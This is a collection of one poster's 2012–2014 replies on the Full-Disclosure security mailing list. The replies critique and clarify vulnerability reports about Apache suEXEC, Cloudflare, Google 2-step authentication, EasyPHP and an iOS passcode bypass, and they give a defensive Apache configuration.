Re: [Full-disclosure] Apache suEXEC privilege elevation / information disclosure

2013-08-07 Thread andfarm
On 2013-08-07, at 09:08, king cope  
wrote:
> SymLinksIfOwnerMatch will not help in this attack scenario because the
> .htaccess file overwrites this Options directive

AllowOverride can be used to prevent this as well by specifying a set of values 
for Options which does not include FollowSymlinks, e.g.

AllowOverride AuthConfig FileInfo Indexes Limit 
Options=ExecCGI,Includes,Indexes,MultiViews,SymlinksIfOwnerMatch

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] [DAHAX-2013-001] Cloudflare XSS Vulnerability

2013-08-22 Thread andfarm
On 2013-08-22, at 12:02, Ryan Dewhurst  wrote:
> I presume you could use CSRF and then XMLHttpRequest to set the
> X-Forwarded-For and
> User-Agent header.

XMLHttpRequest cannot set those headers for a cross-origin request. So you 
could only attack your own site that way.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Google vulnerabilities with PoC

2014-03-13 Thread andfarm
On Mar 13, 2014, at 10:33, Brandon Perry  wrote:
> If you were evil, you could upload huge blobs and just take up space on the 
> google servers. Who knows what will happen if you upload a couple hundred 
> gigs of files. They dont disappear, they are just unretrievable afaict. It is 
> a security risk in the sense that untrusted data is being persisted 
> *somewhere*.

It's not even clear at this point that the uploaded data is even being 
persisted! Since the uploaded file is not made available for download, it's 
entirely possible that it is being deleted as soon as Google's video 
transcoding systems discover it isn't a supported video format.

The comments on the Softpedia article are painfully stupid, by the way. I 
recommend not reading them. :)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Security Problem with Google’s 2-Step Authentication

2012-07-30 Thread andfarm
On 2012-07-30, at 07:41, Pablo Ximenes  wrote:
> I'd like to share with you one of my findings that failed to get
> Google's Security Reward. Although Google doesn't consider it a
> security problem, some might find it at least amusing if not
> interesting.

>From the linked article, http://ximen.es/?p=653 -
> I found out they have a time window of 10 minutes in which any of the 20 OTP 
> passwords are valid. [...] I have suggested invalidating all the time window 
> (all the 20 OTPs) [when a user uses an OTP...]

Invalidating the entire window would make you unable to authenticate using OTP 
more than once every 10 minutes. In any case, I'm having a hard time imagining 
what sort of threat model which make this necessary -- if you can somehow 
predict a user's OTP code for some point in the future, you could go ahead and 
predict one that's even further in the future (outside the window of 
invalidated keys), and use it when that time arrives.

> or at least they could synchronize accounts.google.com’s watch with the 
> user’s at some point, like some banks do.

Current versions of Google Authenticator have an option to do exactly this. The 
10-minute window seems kind of wide; I'd imagine that it was introduced before 
the time sync option was available, for compatibility with devices that are on 
cell networks with bad time servers.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] EasyPHP 12.1 - Remote code execution of any php/js on local PC

2012-12-03 Thread andfarm
On 2012-12-03, at 17:40, Seth Arnold  wrote:
> Their documentation is extremely clear that their software should only
> ever be used locally:
> 
> If their webserver binds to anything other than localhost then I'll
> quickly agree that this is a misconfiguration and a security problem.
> 
> But if they do bind to localhost only this seems a bit overhyped.

It's still vulnerable to XSRF even if it only binds to localhost. And, given 
that the vulnerable script codetester.php is at a known location and requires 
no nonce for submissions, it's incredibly straightforward to attack.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Apple iOS v6.1 (10B143) - Code Lock Bypass Vulnerability #2

2013-02-18 Thread andfarm
On 2013-02-17, at 17:21, Vulnerability Lab  
wrote:
> A code lock bypass vulnerability via iOS as glitch is detected in the
> official Apple iOS v6.1 (10B143) for iPad & iPhone.

Did you actually test the exploit on the iPad? I'm guessing you didn't, because 
the iPad has no emergency call function (nor, for that matter, any phone 
functionality at all).


> The vulnerability allows an attacker with physical access to bypass via a
> glitch in the iOS kernel the main device code lock (auth).

What makes you think the kernel is involved? Springboard seems a much more 
likely candidate, seeing as how it's what actually handles the passcode lock 
screen.

Also, the term you are looking for here is "passcode lock". Not "code lock", 
nor "auth".


> The vulnerability is located in the main login module of the mobile iOS
> device (iphone or ipad)

Wait a minute, now it's an issue with the "main login module", not the kernel? 
Can you identify what application or framework this module is part of?

OK, let's just be honest here. Did you actually locate any code which is 
responsible for allowing this exploit to work, or are you just guessing?


> The vulnerability can be exploited by local attackers with physical device
> access without privileged iOS account or required user interaction.

Oh boy, this one is giving me hives.

1. A "local attacker" is usually implied to have physical access, *especially* 
to a handheld device. If they didn't, they'd be a remote attacker.

2. iOS doesn't really have accounts, let alone "privileged" ones.

3. The exploit is composed entirely of user interactions. Saying that "the 
vulnerability can be exploited [...without...] required user interaction" is 
completely, utterly, totally wrong.

Hell, this whole sentence says almost nothing. It's all implied by a 
non-logorrheic description of the exploit, like "we found a way to get an 
iPhone to sync with a computer without entering the passcode".


I haven't tested the exploit myself yet, but the first step makes me wonder:

> 0.  Connect your device with itunes and the appstore to make sure the code 
> lock is activated

If you've previously connected the phone to the computer, you don't need to 
unlock the device to sync it. Am I misreading this step, or do all the 
following steps just lead up to a perfectly ordinary sync?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/